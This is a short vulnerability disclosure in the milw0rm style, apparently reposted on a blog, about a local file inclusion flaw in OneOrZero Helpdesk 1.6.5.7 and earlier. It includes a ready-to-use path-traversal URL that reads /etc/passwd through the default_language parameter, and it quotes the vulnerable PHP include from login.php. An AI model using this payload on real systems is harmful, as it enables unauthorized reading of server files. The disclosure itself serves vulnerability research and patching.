OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability

OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability

Script: "OneOrZero Helpdesk and Task Management System is a powerful enterprise helpdesk system
used by companies and groups large and small to manage information and requests in their organization. "
Script site: http://www.oneorzero.com/
Download: http://www.oneorzero.com/index.php?controller=main_general&option=main_downloads

[LFI] Vuln: http://site.com/oozv1657/common/login.php?default_language=../../../../../../../../../../etc/passwd

Bug: ./oozv1657/common/login.php (line: 104)

require_once "../common/common.php";
if (eregi("supporter", $_SERVER[PHP_SELF]) || eregi("admin", $_SERVER[PHP_SELF]))
require_once "../lang/$default_language.lang.php";
else
require_once "lang/$default_language.lang.php"; // LFI (register_globals = On, magic_quotes_gpc = Off)

Greetz: D3m0n_DE * str0ke * and otherz..

[ dun / 2009 ]

# milw0rm

No comments:

Post a Comment